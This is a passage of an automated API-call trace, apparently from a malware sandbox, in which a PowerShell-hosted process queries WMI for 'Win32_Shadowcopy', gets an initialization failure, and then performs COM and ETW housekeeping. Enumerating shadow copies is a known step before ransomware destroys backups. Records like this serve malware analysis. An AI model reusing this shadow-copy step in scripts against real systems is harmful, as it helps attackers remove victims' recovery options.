lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0162.773] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0163.027] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86de77c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de77c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x3c, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0163.049] SetEvent (hEvent=0x7b0) returned 1 [0163.049] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x86de98c*=0x7b0, lpdwindex=0x86de7ac | out: lpdwindex=0x86de7ac) returned 0x0 [0163.074] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86de920, nSize=0xc3 | out: lpBuffer="࡭玨࡭࡭࡭ңȀ氻࡭ᆪ玨䷜汳䅄ı") returned 0x0 [0163.082] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0163.082] GetFileType (hFile=0x94) returned 0x2 [0163.082] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x86deac0 | out: lpMode=0x86deac0) returned 1 [0163.106] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86dea80 | out: lpConsoleScreenBufferInfo=0x86dea80) returned 1 [0163.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86dea80 | out: lpConsoleScreenBufferInfo=0x86dea80) returned 1 [0163.360] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86de9e0, nSize=0xc3 | out: lpBuffer="࡭肈琂￿￿玨玨࡭࡭᫠浨࡭玨࡭࡭࡭ҧȀ᫠浨࡭ᆪ玨䷜汳䅄ı") returned 0x0 [0163.493] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ded4c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ded4c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0163.493] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86decb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86decb8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0163.493] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ded3c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ded3c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0163.546] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6f8 [0163.547] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7bc [0163.588] SetEvent (hEvent=0x7bc) returned 1 [0163.590] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x86de9e8*=0x6f8, lpdwindex=0x86de804 | out: lpdwindex=0x86de804) returned 0x0 [0163.697] CoGetContextToken (in: pToken=0x86de8b8 | out: pToken=0x86de8b8) returned 0x0 [0163.698] CoGetContextToken (in: pToken=0x86de818 | out: pToken=0x86de818) returned 0x0 [0163.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x86de8e8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x86de8e4 | out: ppvObject=0x86de8e4*=0x7a9ebd8) returned 0x0 [0163.698] WbemDefPath:IUnknown:AddRef (This=0x7a9ebd8) returned 0x3 [0163.699] WbemDefPath:IUnknown:Release (This=0x7a9ebd8) returned 0x2 [0163.702] WbemDefPath:IWbemPath:SetText (This=0x7a9ebd8, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0 [0163.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x7a9ebd8, puCount=0x86dea64 | out: puCount=0x86dea64*=0x2) returned 0x0 [0163.705] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=4, puBuffLength=0x86dea60*=0x0, pszText=0x0 | out: puBuffLength=0x86dea60*=0x17, pszText=0x0) returned 0x0 [0163.706] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=4, puBuffLength=0x86dea60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x86dea60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0163.710] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x7a9ebd8, puCount=0x86dea68 | out: puCount=0x86dea68*=0x2) returned 0x0 [0163.710] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=4, puBuffLength=0x86dea64*=0x0, pszText=0x0 | out: puBuffLength=0x86dea64*=0x17, pszText=0x0) returned 0x0 [0163.710] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=4, puBuffLength=0x86dea64*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x86dea64*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0163.805] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x86de8fc*=0x808, lpdwindex=0x86de7ac | out: lpdwindex=0x86de7ac) returned 0x0 [0167.949] CoGetContextToken (in: pToken=0x86de7b8 | out: pToken=0x86de7b8) returned 0x0 [0167.949] CoGetContextToken (in: pToken=0x86de718 | out: pToken=0x86de718) returned 0x0 [0167.949] CoGetContextToken (in: pToken=0x86de718 | out: pToken=0x86de718) returned 0x0 [0167.949] CoGetContextToken (in: pToken=0x86de6c0 | out: pToken=0x86de6c0) returned 0x0 [0167.949] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b4f070*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de69c | out: ppvObject=0x86de69c*=0x12f9f80) returned 0x0 [0167.950] CObjectContext::ContextCallback () returned 0x0 [0168.012] IUnknown:Release (This=0x12f9f80) returned 0x1 [0168.013] CoUnmarshalInterface (in: pStm=0x763bc90, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x86de70c | out: ppv=0x86de70c*=0x76c7a84) returned 0x0 [0168.013] CoMarshalInterface (pStm=0x763bc90, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x76c7a84, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0168.014] WbemLocator:IUnknown:QueryInterface (in: This=0x76c7a84, riid=0x86de7e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x86de7e4 | out: ppvObject=0x86de7e4*=0x75e1248) returned 0x0 [0168.016] WbemLocator:IUnknown:Release (This=0x76c7a84) returned 0x1 [0168.016] IWbemServices:ExecQuery (in: This=0x75e1248, strQueryLanguage="WQL", strQuery="select * from Win32_Shadowcopy", lFlags=16, pCtx=0x0, ppEnum=0x86de9c4 | out: ppEnum=0x86de9c4*=0x75ee208) returned 0x0 [0168.034] IUnknown:QueryInterface (in: This=0x75ee208, riid=0x6e2a352c*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de820 | out: ppvObject=0x86de820*=0x75ee20c) returned 0x0 [0168.034] IClientSecurity:QueryBlanket (in: This=0x75ee20c, pProxy=0x75ee208, pAuthnSvc=0x86de870, pAuthzSvc=0x86de86c, pServerPrincName=0x86de864, pAuthnLevel=0x86de868, pImpLevel=0x86de858, pAuthInfo=0x86de85c, pCapabilites=0x86de860 | out: pAuthnSvc=0x86de870*=0xa, pAuthzSvc=0x86de86c*=0x0, pServerPrincName=0x86de864, pAuthnLevel=0x86de868*=0x6, pImpLevel=0x86de858*=0x2, pAuthInfo=0x86de85c, pCapabilites=0x86de860*=0x1) returned 0x0 [0168.034] IUnknown:Release (This=0x75ee20c) returned 0x1 [0168.034] IUnknown:QueryInterface (in: This=0x75ee208, riid=0x6e2a351c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de814 | out: ppvObject=0x86de814*=0x76c8584) returned 0x0 [0168.034] IUnknown:QueryInterface (in: This=0x75ee208, riid=0x6e2a352c*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de800 | out: ppvObject=0x86de800*=0x75ee20c) returned 0x0 [0168.034] IClientSecurity:SetBlanket (This=0x75ee20c, pProxy=0x75ee208, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0168.100] IUnknown:Release (This=0x75ee20c) returned 0x2 [0168.100] WbemLocator:IUnknown:Release (This=0x76c8584) returned 0x1 [0168.101] CoTaskMemFree (pv=0x76d6cd0) [0168.101] IUnknown:AddRef (This=0x75ee208) returned 0x2 [0168.101] CoGetContextToken (in: pToken=0x86ddd38 | out: pToken=0x86ddd38) returned 0x0 [0168.101] IUnknown:QueryInterface (in: This=0x12fa028, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86ddcf4 | out: ppvObject=0x86ddcf4*=0x12fa034) returned 0x0 [0168.102] IComThreadingInfo:GetCurrentApartmentType (in: This=0x12fa034, pAptType=0x86ddd24 | out: pAptType=0x86ddd24*=3) returned 0x0 [0168.102] IUnknown:Release (This=0x12fa034) returned 0x0 [0168.102] CoGetObjectContext (in: riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7b11f1c | out: ppv=0x7b11f1c*=0x12fa028) returned 0x0 [0168.102] CoGetContextToken (in: pToken=0x86de140 | out: pToken=0x86de140) returned 0x0 [0168.102] IUnknown:QueryInterface (in: This=0x75ee208, riid=0x73b502b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de0d8 | out: ppvObject=0x86de0d8*=0x76c8568) returned 0x0 [0168.102] WbemLocator:IRpcOptions:Query (in: This=0x76c8568, pPrx=0x7b12140, dwProperty=2, pdwValue=0x86de1d8 | out: pdwValue=0x86de1d8) returned 0x80004002 [0168.102] WbemLocator:IUnknown:Release (This=0x76c8568) returned 0x2 [0168.103] CoGetContextToken (in: pToken=0x86de720 | out: pToken=0x86de720) returned 0x0 [0168.103] CoGetContextToken (in: pToken=0x86de680 | out: pToken=0x86de680) returned 0x0 [0168.103] IUnknown:QueryInterface (in: This=0x75ee208, riid=0x86de750*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x86de618 | out: ppvObject=0x86de618*=0x75ee208) returned 0x0 [0168.103] IUnknown:Release (This=0x75ee208) returned 0x2 [0168.103] WbemLocator:IUnknown:Release (This=0x75e1248) returned 0x0 [0168.103] SysStringLen (param_1=0x0) returned 0x0 [0168.103] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x7a9ebd8, puCount=0x86dea10 | out: puCount=0x86dea10*=0x2) returned 0x0 [0168.103] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=4, puBuffLength=0x86dea0c*=0x0, pszText=0x0 | out: puBuffLength=0x86dea0c*=0x17, pszText=0x0) returned 0x0 [0168.104] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=4, puBuffLength=0x86dea0c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x86dea0c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0168.104] CoGetContextToken (in: pToken=0x86de860 | out: pToken=0x86de860) returned 0x0 [0168.104] IEnumWbemClassObject:Clone (in: This=0x75ee208, ppEnum=0x86dea1c | out: ppEnum=0x86dea1c*=0x75ed8a8) returned 0x0 [0168.222] IUnknown:QueryInterface (in: This=0x75ed8a8, riid=0x6e2a352c*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de8d8 | out: ppvObject=0x86de8d8*=0x75ed8ac) returned 0x0 [0168.222] IClientSecurity:QueryBlanket (in: This=0x75ed8ac, pProxy=0x75ed8a8, pAuthnSvc=0x86de928, pAuthzSvc=0x86de924, pServerPrincName=0x86de91c, pAuthnLevel=0x86de920, pImpLevel=0x86de910, pAuthInfo=0x86de914, pCapabilites=0x86de918 | out: pAuthnSvc=0x86de928*=0xa, pAuthzSvc=0x86de924*=0x0, pServerPrincName=0x86de91c, pAuthnLevel=0x86de920*=0x6, pImpLevel=0x86de910*=0x2, pAuthInfo=0x86de914, pCapabilites=0x86de918*=0x1) returned 0x0 [0168.222] IUnknown:Release (This=0x75ed8ac) returned 0x1 [0168.222] IUnknown:QueryInterface (in: This=0x75ed8a8, riid=0x6e2a351c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de8cc | out: ppvObject=0x86de8cc*=0x76c8284) returned 0x0 [0168.222] IUnknown:QueryInterface (in: This=0x75ed8a8, riid=0x6e2a352c*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de8b8 | out: ppvObject=0x86de8b8*=0x75ed8ac) returned 0x0 [0168.222] IClientSecurity:SetBlanket (This=0x75ed8ac, pProxy=0x75ed8a8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0168.266] IUnknown:Release (This=0x75ed8ac) returned 0x2 [0168.266] WbemLocator:IUnknown:Release (This=0x76c8284) returned 0x1 [0168.266] CoTaskMemFree (pv=0x76d6d30) [0168.266] IUnknown:AddRef (This=0x75ed8a8) returned 0x2 [0168.267] CoGetContextToken (in: pToken=0x86ddde0 | out: pToken=0x86ddde0) returned 0x0 [0168.267] CoGetContextToken (in: pToken=0x86de1e8 | out: pToken=0x86de1e8) returned 0x0 [0168.267] IUnknown:QueryInterface (in: This=0x75ed8a8, riid=0x73b502b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de180 | out: ppvObject=0x86de180*=0x76c8268) returned 0x0 [0168.267] WbemLocator:IRpcOptions:Query (in: This=0x76c8268, pPrx=0x7b11f00, dwProperty=2, pdwValue=0x86de280 | out: pdwValue=0x86de280) returned 0x80004002 [0168.267] WbemLocator:IUnknown:Release (This=0x76c8268) returned 0x2 [0168.268] CoGetContextToken (in: pToken=0x86de7c8 | out: pToken=0x86de7c8) returned 0x0 [0168.268] CoGetContextToken (in: pToken=0x86de728 | out: pToken=0x86de728) returned 0x0 [0168.268] IUnknown:QueryInterface (in: This=0x75ed8a8, riid=0x86de7f8*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x86de6c0 | out: ppvObject=0x86de6c0*=0x75ed8a8) returned 0x0 [0168.268] IUnknown:Release (This=0x75ed8a8) returned 0x2 [0168.268] SysStringLen (param_1=0x0) returned 0x0 [0168.269] IEnumWbemClassObject:Reset (This=0x75ed8a8) returned 0x0 [0168.307] CoTaskMemAlloc (cb=0x4) returned 0x7aeb740 [0168.308] IEnumWbemClassObject:Next (in: This=0x75ed8a8, lTimeout=-1, uCount=0x1, apObjects=0x7aeb740, puReturned=0x540b264 | out: apObjects=0x7aeb740*=0x0, puReturned=0x540b264*=0x0) returned 0x80041014 [0168.364] CoTaskMemFree (pv=0x7aeb740) [0168.364] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x86de9f8 | out: pperrinfo=0x86de9f8*=0x76d8c8c) returned 0x0 [0168.365] IUnknown:QueryInterface (in: This=0x76d8c8c, riid=0x6e2a32c8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de9f4 | out: ppvObject=0x86de9f4*=0x76d8c84) returned 0x0 [0168.365] IMarshal:GetUnmarshalClass (in: This=0x76d8c84, riid=0x6e2a3338*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x86de9fc | out: pCid=0x86de9fc*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0168.365] IUnknown:Release (This=0x76d8c84) returned 0x1 [0168.367] IUnknown:QueryInterface (in: This=0x76d8c8c, riid=0x540b2e0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x86dea4c | out: ppvObject=0x86dea4c*=0x76d8c80) returned 0x0 [0168.367] IUnknown:Release (This=0x76d8c8c) returned 0x1 [0168.368] IIDFromString (in: lpsz="{EB87E1BD-3233-11D2-AEC9-00C04FB68820}", lpiid=0x86de93c | out: lpiid=0x86de93c) returned 0x0 [0168.369] CoGetClassObject (in: rclsid=0x76d6cdc*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), dwClsContext=0x15, pvReserved=0x0, riid=0x73b5b24c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x86de648 | out: ppv=0x86de648*=0x7aeb740) returned 0x0 [0168.373] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb740, riid=0x73ba9e44*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x86de864 | out: ppvObject=0x86de864*=0x0) returned 0x80004002 [0168.373] WbemStatusCodeText:IClassFactory:CreateInstance (in: This=0x7aeb740, pUnkOuter=0x0, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de870 | out: ppvObject=0x86de870*=0x7aeb780) returned 0x0 [0168.373] WbemStatusCodeText:IUnknown:Release (This=0x7aeb740) returned 0x0 [0168.373] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de494 | out: ppvObject=0x86de494*=0x7aeb780) returned 0x0 [0168.373] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73b50328*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x86de450 | out: ppvObject=0x86de450*=0x0) returned 0x80004002 [0168.373] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73b50490*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x86de044 | out: ppvObject=0x86de044*=0x0) returned 0x80004002 [0168.374] WbemStatusCodeText:IUnknown:AddRef (This=0x7aeb780) returned 0x3 [0168.374] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73b50074*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x86ddda4 | out: ppvObject=0x86ddda4*=0x0) returned 0x80004002 [0168.374] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73b4ffc8*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x86ddd54 | out: ppvObject=0x86ddd54*=0x0) returned 0x80004002 [0168.374] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73a97604*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86ddd60 | out: ppvObject=0x86ddd60*=0x0) returned 0x80004002 [0168.374] CoGetContextToken (in: pToken=0x86dddc0 | out: pToken=0x86dddc0) returned 0x0 [0168.374] CoGetContextToken (in: pToken=0x86de1c8 | out: pToken=0x86de1c8) returned 0x0 [0168.374] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x73b502b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x86de254 | out: ppvObject=0x86de254*=0x0) returned 0x80004002 [0168.374] WbemStatusCodeText:IUnknown:Release (This=0x7aeb780) returned 0x2 [0168.374] WbemStatusCodeText:IUnknown:Release (This=0x7aeb780) returned 0x1 [0168.374] CoGetContextToken (in: pToken=0x86de850 | out: pToken=0x86de850) returned 0x0 [0168.374] CoGetContextToken (in: pToken=0x86de7b0 | out: pToken=0x86de7b0) returned 0x0 [0168.374] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x7aeb780, riid=0x86de880*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x86de87c | out: ppvObject=0x86de87c*=0x7aeb780) returned 0x0 [0168.374] WbemStatusCodeText:IUnknown:AddRef (This=0x7aeb780) returned 0x3 [0168.375] WbemStatusCodeText:IUnknown:Release (This=0x7aeb780) returned 0x2 [0168.379] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x7aeb780, hRes=0x80041014, LocaleId=0x0, lFlags=1, MessageText=0x86de9ec | out: MessageText=0x86de9ec*="Initialization failure ") returned 0x0 [0168.380] SysStringByteLen (bstr="Initialization failure ") returned 0x2e [0168.394] CoGetContextToken (in: pToken=0x86dcc98 | out: pToken=0x86dcc98) returned 0x0 [0168.394] IUnknown:Release (This=0x75ed8a8) returned 0x1 [0168.394] IUnknown:Release (This=0x75ed8a8) returned 0x0 [0168.576] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86de7d8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de7d8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0168.576] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86de744*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de744*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0168.576] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86de7c8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86de7c8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0168.592] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86de6a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de6a4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0168.592] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86de610*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86de610*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0168.592] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86de694*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, 